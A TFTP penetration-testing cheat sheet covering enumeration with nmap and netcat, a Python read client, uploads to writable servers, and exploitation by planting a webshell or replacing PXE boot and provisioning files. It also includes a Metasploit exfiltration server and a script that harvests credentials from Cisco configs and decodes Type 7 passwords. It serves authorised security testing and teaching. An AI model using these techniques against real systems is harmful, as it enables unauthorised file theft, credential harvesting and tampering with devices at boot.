TFTP Pentesting

Port: UDP 69 (the server answers each transfer from a fresh ephemeral port, see the Netcat caveat below)

TFTP (Trivial File Transfer Protocol, RFC 1350) is a minimal UDP file transfer protocol: no authentication, no encryption, and no directory listing, so enumeration means guessing filenames. Commonly used for network device config backup/restore, PXE boot and VoIP phone provisioning. Whether the server is read-only or writable decides how far you can take it.


Discovery

# UDP scan (needs root; a silent UDP port shows as "open|filtered", so confirm
# with -sV or the tftp-enum script below rather than trusting the port state)
nmap -sU -p 69 $ip

# Service version
nmap -sU -p 69 -sV $ip

Enumeration with Nmap Scripts

File Enumeration

# Enumerate common files (default wordlist)
nmap -sU -p 69 --script=tftp-enum $ip

Output:

69/udp open  tftp
| tftp-enum: 
|_  ciscortr.cfg

Version Detection

nmap -sU -p 69 --script=tftp-version $ip

Custom Wordlist

nmap -sU -p 69 --script=tftp-enum --script-args tftp-enum.filelist=/path/to/wordlist.txt $ip

Common Files to Check

# Network devices
ciscortr.cfg
running-config
startup-config
router.cfg
switch.cfg

# Boot files
pxelinux.0
pxelinux.cfg/default
boot.cfg

# Other
test.txt
config.txt
backup.cfg

Manual Interaction

TFTP Client

# Non-interactive get (-c is tftp-hpa client syntax)
tftp $ip -c get filename.cfg

# Interactive mode
tftp $ip
tftp> get ciscortr.cfg
tftp> quit

Netcat (Raw)

# Read request (opcode 01): 00 01 | filename | 00 | mode | 00
echo -e "\x00\x01filename\x00octet\x00" | nc -u $ip 69

# Test with timeout
timeout 2 bash -c "echo -e '\x00\x01test.txt\x00octet\x00' | nc -u $ip 69" | xxd

Caveat: the server replies (DATA or ERROR) from a new random source port, its transfer ID, not from 69. A client-mode nc/ncat connects its UDP socket to $ip:69, so the kernel discards that reply and the one-liner prints nothing even when the service is alive and the file exists. Treat an empty result as inconclusive and confirm with a packet capture on the scanning host, or use a real client that follows the port switch.

TFTP Opcodes

Opcode  Operation
01      Read Request (RRQ)
02      Write Request (WRQ)
03      Data
04      Acknowledgment
05      Error
06      Option Acknowledgment (OACK, RFC 2347; only sent when the request carried options such as blksize or tsize)

An Error packet carries a 2-byte code and a NUL-terminated message. The code is worth reading when guessing names: 1 vs. 2 can separate "no such file" from "exists but not readable from this root".

Code  Meaning
0     Not defined (see the message)
1     File not found
2     Access violation
3     Disk full or allocation exceeded
4     Illegal TFTP operation
5     Unknown transfer ID
6     File already exists
7     No such user
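The exchange behind the raw Netcat request and the opcode table above, as an added example that is not part of the original cheat sheet: a Python RFC 1350 read client that follows the server's transfer-ID port switch (the reason a plain `nc -u` often shows nothing), ACKs every block, stops on a short block and turns ERROR packets into exceptions, plus a name-guessing loop that does what tftp-enum does. So that it runs offline it also includes a constructed in-memory tftpd on 127.0.0.1; the filenames, contents and port in the demo are made up.

```python
# Added example (not code from the original page): an RFC 1350 read client plus a
# constructed in-memory tftpd, so the whole exchange can be run offline on 127.0.0.1.
import socket
import struct
import threading

BLOCK = 512
RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5

def build_rrq(filename, mode="octet"):
    # 00 01 | filename | 00 | mode | 00 : the same bytes the netcat one-liner sends
    return struct.pack("!H", RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"

def build_packet(opcode, number, body=b""):
    # DATA: block + payload; ACK: block; ERROR: code + NUL-terminated message
    return struct.pack("!HH", opcode, number) + body

def parse_packet(pkt):
    """Return (opcode, block/error-code/filename, body) for any TFTP packet."""
    op, num = struct.unpack("!HH", pkt[:4])  # struct.error on a truncated packet
    if op in (RRQ, WRQ):  # filename and mode are NUL-terminated strings
        fname, mode = pkt[2:].split(b"\x00")[:2]
        return op, fname.decode(errors="replace"), mode.decode(errors="replace")
    if op == ERROR:
        return op, num, pkt[4:].split(b"\x00")[0].decode(errors="replace")
    return op, num, pkt[4:]

class TftpError(Exception):
    pass

def tftp_get(host, port, filename, timeout=2.0):
    """Fetch one file; ACKs go to the server's transfer ID, never back to port 69."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    out, expected, peer = bytearray(), 1, None
    try:
        sock.sendto(build_rrq(filename), (host, port))
        while True:
            try:
                pkt, addr = sock.recvfrom(4 + BLOCK)
            except socket.timeout:
                raise TftpError("no reply for %r (filtered, or reply port blocked)" % filename)
            peer = peer or addr  # the first reply fixes the server's TID (a fresh port)
            if addr != peer:
                continue  # RFC 1350 s.4: ignore datagrams from other TIDs
            op, num, body = parse_packet(pkt)
            if op == ERROR:
                raise TftpError("error %d: %s" % (num, body))
            if op != DATA or num not in (expected, expected - 1):
                continue
            sock.sendto(build_packet(ACK, num), peer)  # re-ACKing a repeated block is harmless
            if num == expected:
                out += body
                expected += 1
                if len(body) < BLOCK:  # a short (possibly empty) block ends the transfer
                    return bytes(out)
    finally:
        sock.close()

def enumerate_files(host, port, candidates):
    found = {}  # TFTP has no directory listing, so probe names one by one
    for name in candidates:
        try:
            found[name] = tftp_get(host, port, name)
        except TftpError:
            pass
    return found

def start_server(files, host="127.0.0.1"):
    """Constructed read-only tftpd over a dict; replies from a new socket (TID) per transfer."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind((host, 0))
    def loop():
        while True:
            req, client = listener.recvfrom(1024)
            op, name, _ = parse_packet(req)
            xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            xfer.settimeout(2.0)
            if op != RRQ or name not in files:
                xfer.sendto(build_packet(ERROR, 1, b"File not found\x00"), client)
            else:
                blob, block = files[name], 1
                while True:
                    chunk = blob[(block - 1) * BLOCK:block * BLOCK]
                    xfer.sendto(build_packet(DATA, block, chunk), client)
                    try:
                        ack = xfer.recvfrom(4)[0]
                    except socket.timeout:
                        break
                    if parse_packet(ack)[:2] != (ACK, block) or len(chunk) < BLOCK:
                        break
                    block += 1
            xfer.close()
    threading.Thread(target=loop, daemon=True).start()
    return listener.getsockname()[1]

if __name__ == "__main__":
    port = start_server({"ciscortr.cfg": b"hostname edge-rtr1\n", "pxelinux.0": bytes(1300)})
    print(sorted(enumerate_files("127.0.0.1", port, ["test.txt", "ciscortr.cfg", "pxelinux.0"])))
```

Against a real target call `tftp_get(ip, 69, "ciscortr.cfg")`, or feed `enumerate_files` the Common Files list above to reproduce the tftp-enum probe. The `peer` check is the transfer-ID rule from RFC 1350 section 4; leaving it out (or, as with a connected `nc -u`, being unable to receive from the new port) is the classic TFTP client mistake.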

File Upload (If Writable)

# Upload file
tftp $ip -c put localfile.txt remotefile.txt

# Interactive
tftp $ip
tftp> put shell.php

Exploitation

If the server is writable and its root overlaps something that another service executes or that clients fetch at boot:

  1. Upload a webshell (TFTP root inside a web root) and access it via HTTP
  2. Replace a boot or provisioning file that clients pull on startup (e.g. pxelinux.cfg/default, a device config)

Check first whether the server accepts new filenames at all: tftpd-hpa by default only accepts a PUT for a file that already exists and is world-writable, and needs -c/--create to create new files. Try overwriting a file you already found before concluding that the server is read-only.

Metasploit

# TFTP enumeration
use auxiliary/scanner/tftp/tftpbrute
set RHOSTS $ip
run

# TFTP server (for exfil)
use auxiliary/server/tftp
set TFTPROOT /tmp
run

Config File Analysis

Network device configs often contain:

  • Usernames/passwords (plaintext, Type 7 reversible obfuscation, or Type 5/8/9 hashes)
  • SNMP community strings (a RW community gives config read/write over SNMP)
  • VPN pre-shared keys (crypto isakmp key ...)
  • AAA server keys (tacacs-server / radius-server key, often Type 7)
  • Network topology info (interfaces, routes, ACLs, neighbours)
  • Domain names/hostnames

Cisco Password Cracking

Type 7 is not a hash: it is a fixed-key XOR with a two-digit seed and decodes instantly, so no cracking is involved. Type 5 (MD5crypt), 8 (PBKDF2-SHA256) and 9 (scrypt) are real hashes. See Hashcat - Network Device Hashes for the modes and command lines.
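The checks behind the two sections above (Config File Analysis and Cisco Password Cracking), as an added example that is not from the original page: a Python scanner that walks a fetched IOS-style config, flags the credential-bearing lines, reverses Type 7 strings in place using Cisco's published fixed XOR key, and tags the real hash types with the hashcat mode to use. SAMPLE_CONFIG is constructed for the demo (its Type 5 hash is a placeholder, not a real hash, and the addresses are documentation ranges); the regexes are a heuristic for common IOS syntax, not a full config parser.

```python
# Added example (not code from the original page): scan a fetched IOS-style config for
# the secrets listed above and reverse Type 7 in place. SAMPLE_CONFIG is constructed.
import re

# Cisco's fixed Type 7 key. A Type 7 string is a two-digit decimal seed (an offset into
# this key) followed by hex bytes, each XORed with the next key byte. No secret involved.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# hashcat modes for the real (hashed) secret types; Type 7 is decoded, not cracked
HASH_INFO = {
    "4": "SHA-256, unsalted (hashcat -m 5700)",
    "5": "MD5crypt (hashcat -m 500)",
    "8": "PBKDF2-SHA256 (hashcat -m 9200)",
    "9": "scrypt (hashcat -m 9300)",
}

def decode_type7(enc):
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("not a Type 7 string: %r" % enc)
    seed, body = int(enc[:2]), bytes.fromhex(enc[2:])  # ValueError on non-hex input
    out = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return out.decode("latin-1")

def encode_type7(plain, seed=2):
    """Inverse of decode_type7, for round-trip checks or for crafting a config to upload."""
    raw = plain.encode("latin-1")
    body = bytes(c ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, c in enumerate(raw))
    return "%02d%s" % (seed, body.hex().upper())

PATTERNS = [  # applied to each stripped line; first match wins; ctx = the leading keywords
    ("type7", re.compile(r"^(?P<ctx>.*?)(?:password|key) 7 (?P<enc>[0-9A-Fa-f]+)$")),
    ("hash", re.compile(r"^(?P<ctx>.*?)secret (?P<type>[4589]) (?P<hash>\S+)$")),
    ("plaintext", re.compile(r"^(?P<ctx>.*?)(?:password|key) (?:0 )?(?P<secret>\S+)$")),
    ("snmp", re.compile(r"^snmp-server community (?P<community>\S+)(?: (?P<perm>RO|RW))?")),
    ("psk", re.compile(r"^crypto isakmp key (?P<psk>\S+) address (?P<peer>\S+)")),
    ("name", re.compile(r"^(?:hostname|ip domain[- ]name) (?P<name>\S+)$")),
]

# Constructed sample; the $1$ hash is a placeholder, not a real hash.
SAMPLE_CONFIG = """\
hostname edge-rtr1
ip domain-name corp.example
enable secret 5 $1$abcd$0123456789abcdefghijkl
username admin privilege 15 password 7 0822455D0A16
username backup password 7 094F471A1A0A
username svc password 0 Winter2024
snmp-server community public RO
snmp-server community s3cr3tRW RW
tacacs-server host 192.0.2.10 key 7 0215015819031B
crypto isakmp key Branch0ffic3! address 203.0.113.7
line vty 0 4
 password 7 0822455D0A16
 login
"""

def analyze_config(text):
    """Return a list of finding dicts, one per interesting line, in file order."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        for kind, rx in PATTERNS:
            m = rx.match(line)
            if not m:
                continue
            f = {"line": lineno, "kind": kind}
            f.update({k: v for k, v in m.groupdict().items() if v is not None})
            if kind == "type7":
                f["plaintext"] = decode_type7(f["enc"])
            elif kind == "hash":
                f["crack"] = HASH_INFO.get(f["type"], "unknown type")
            findings.append(f)
            break
    return findings

if __name__ == "__main__":
    for finding in analyze_config(SAMPLE_CONFIG):
        print(finding)
```

Run it against a config pulled with `tftp ... get` and read the Type 7 results directly; only the `hash` findings go to hashcat. The two `0822455D0A16` / `094F471A1A0A` strings are the long-published "cisco" test vectors, which is a quick way to confirm the key table on any decoder.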


Common TFTP Software

Software          Notes
atftpd            Linux, common
tftpd-hpa         Linux
Netkit tftpd      Linux
SolarWinds TFTP   Windows
Cisco TFTP        Network devices